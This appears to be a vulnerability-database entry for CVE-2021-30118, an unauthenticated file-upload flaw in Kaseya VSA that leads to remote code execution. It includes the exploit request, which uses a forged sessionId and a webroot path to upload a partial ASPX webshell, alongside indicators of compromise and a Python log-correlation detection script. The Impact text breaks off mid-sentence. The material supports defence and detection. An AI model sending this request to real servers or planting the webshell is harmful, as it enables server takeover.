CVE-2021-30118
published 2021-07-09


Priority: P1 (91), critical, CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW (exploited in the wild), EXPLOIT (public exploit available), VulnCheck KEV
EPSS: 60.08% (99.0th percentile)
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute ASP commands.

The API endpoint /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute ASP commands.

Detailed description
---

Given the following request:

```
POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1
Host: 192.168.1.194
Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219
Content-Length: 12

private const string password = "pass"; // The password ( pass )
private const string style = "dark"; // The style ( light / dark )
protected void Page_Load(object sender, EventArgs e)
{
    //this.Remote(password);
    this.Login(password);
    this.Style();
    this.ServerInfo();
```

The attacker controls the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed, the sessionId is not actually validated: any numeric value is accepted as valid.

Security issues discovered
---

* A sessionId cookie is required by /SystemTab/uploader.aspx but is not actually validated, allowing an attacker to bypass authentication.
* /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any location to which the web server has write access.
* The web server process has write access to the webroot, where the attacker can execute the file by requesting the URL of the newly created file.

Impact
---

This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver p

Affected (2 ranges)

Vendor   Product   Version range   Fixed in
kaseya   vsa       < 9.5.5         9.5.5
kaseya   vsa       < 9.5.6         9.5.6

Detection & IOCs (extracted from sources)

path:  /SystemTab/uploader.aspx
url:   /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx
path:  C:\Kaseya\WebPages\
other: shodan:http.favicon.hash:-1445519482
  • The sessionId cookie is not validated by /SystemTab/uploader.aspx; any numeric value is accepted. Detect exploit attempts by monitoring POST requests to /SystemTab/uploader.aspx that carry a numeric sessionId cookie together with the Filename, PathData and qqfile parameters. A well-formed sessionId is not evidence of a legitimate session.
  • Alert on POST requests to /SystemTab/uploader.aspx whose PathData points into the webroot (e.g. C:\Kaseya\WebPages\) combined with an .aspx filename in the qqfile or Filename parameter; this is the webshell-upload pattern.
  • Monitor for unauthenticated POST requests to /SystemTab/uploader.aspx followed by GET requests to the newly created .aspx file in the webroot, indicating upload-then-execute RCE exploitation.
  • A successful upload returns HTTP 200 with a JSON body reporting success as true. Correlate this with subsequent GET requests to the uploaded filename to confirm exploitation.
  • The __RequestValidationToken parameter uses a fixed GUID value in the documented exploit. It provides no real CSRF protection in this context, since authentication is bypassed entirely.
  • The Nuclei template uses a randomized sessionId (rand_int 11111111–99999999) and a random filename, so exploit traffic will not carry a fixed sessionId or filename. Detection rules must match on the endpoint and parameter pattern rather than on static values.
  • The uploaded webshell self-deletes after execution (File.Delete), which limits forensic artifact recovery from disk after successful exploitation; web server logs are the more reliable record.
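The detection points above, turned into a small log-correlation script. This is an added example, not code from the advisory, the Nuclei template or the vendor: it assumes a trimmed IIS W3C-style access log (date, time, client IP, method, URI stem, URI query, status, cookie; "-" for empty, "+" for space) with the cookie field enabled, and the sample lines are constructed, not a real capture. It flags every POST to /SystemTab/uploader.aspx, rates it higher when PathData falls under C:\Kaseya\WebPages\ and the filename has a script extension, and confirms upload-then-execute by looking for a later successful GET to the URL the file would be served at. Treating .asp alongside .aspx as a script extension is this example's assumption.

```python
import re
from urllib.parse import parse_qs

UPLOADER_PATH = "/systemtab/uploader.aspx"
# Webroot named in the advisory; lower-cased because Windows paths are case-insensitive.
WEBROOT = "c:\\kaseya\\webpages\\"
# The page names .aspx; adding .asp is this example's assumption.
SCRIPT_EXTS = (".aspx", ".asp")

# Constructed sample log (not a real capture). Trimmed IIS W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
SAMPLE_LOG = """\
2021-07-02 13:05:11 10.0.0.7 GET / - 200 -
2021-07-02 13:05:42 203.0.113.5 POST /SystemTab/uploader.aspx Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx 200 sessionId=92812726;+__RequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219
2021-07-02 13:05:43 203.0.113.5 GET /shellz.aspx - 200 -
2021-07-02 13:07:00 10.0.0.8 POST /SystemTab/uploader.aspx Filename=report.pdf&PathData=C%3A%5CKaseya%5CWebPages%5CManagedFiles%5C&qqfile=report.pdf 200 sessionId=55512345
2021-07-02 13:08:15 203.0.113.9 POST /SystemTab/uploader.aspx Filename=x.aspx&PathData=C%3A%5CKaseya%5CWebPages%5Cimg%5C&qqfile=x.aspx 200 sessionId=13371337
"""

LINE_FIELDS = 8


def parse_line(line):
    """Split one log line into a dict; None for lines that do not match the layout."""
    parts = line.strip().split(" ")
    if len(parts) != LINE_FIELDS:
        return None
    date, time, ip, method, stem, query, status, cookie = parts
    return {
        "ts": f"{date} {time}", "ip": ip, "method": method.upper(), "stem": stem,
        "query": "" if query == "-" else query, "status": int(status),
        "cookie": "" if cookie == "-" else cookie.replace("+", " "),
    }


def session_id(cookie):
    m = re.search(r"(?:^|;\s*)sessionId=([^;]*)", cookie)
    return m.group(1) if m else None


def served_url(path_data, filename):
    """URL the written file becomes reachable at, or None if PathData is outside the webroot."""
    norm = path_data.replace("/", "\\")
    if not norm.endswith("\\"):
        norm += "\\"
    if not norm.lower().startswith(WEBROOT):
        return None
    rel = norm[len(WEBROOT):].replace("\\", "/")
    return "/" + rel + filename


def analyze(log_text):
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    findings = []
    for i, ev in enumerate(events):
        if ev["method"] != "POST" or ev["stem"].lower() != UPLOADER_PATH:
            continue
        q = parse_qs(ev["query"], keep_blank_values=True)
        filename = (q.get("qqfile") or q.get("Filename") or [""])[0]
        path_data = (q.get("PathData") or [""])[0]
        sid = session_id(ev["cookie"])
        url = served_url(path_data, filename)
        finding = {
            "ts": ev["ts"], "ip": ev["ip"], "session_id": sid,
            # The endpoint accepts any numeric sessionId, so a well-formed one proves nothing.
            "numeric_session": bool(sid and sid.isdigit()),
            "path_data": path_data, "filename": filename, "url": url,
            "webshell_suspected": url is not None and filename.lower().endswith(SCRIPT_EXTS),
            "executed": False,
        }
        if url and ev["status"] == 200:
            # Upload-then-execute: a later successful GET for the file this POST created.
            finding["executed"] = any(
                later["method"] == "GET"
                and later["stem"].lower() == url.lower()
                and later["status"] == 200
                for later in events[i + 1:]
            )
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        tag = ("RCE CONFIRMED" if f["executed"]
               else "WEBSHELL UPLOAD" if f["webshell_suspected"] else "upload")
        print(f"{f['ts']} {f['ip']} sessionId={f['session_id']} -> {f['url']} [{tag}]")
```

Because the webshell deletes itself, the GET that follows the POST may be the only artifact left once the host is examined; the correlation step exists so that the log pair alone can establish execution. Point `analyze()` at a real log only after adapting `parse_line()` to the field order your IIS logging configuration actually writes.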

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck             9.8     CRITICAL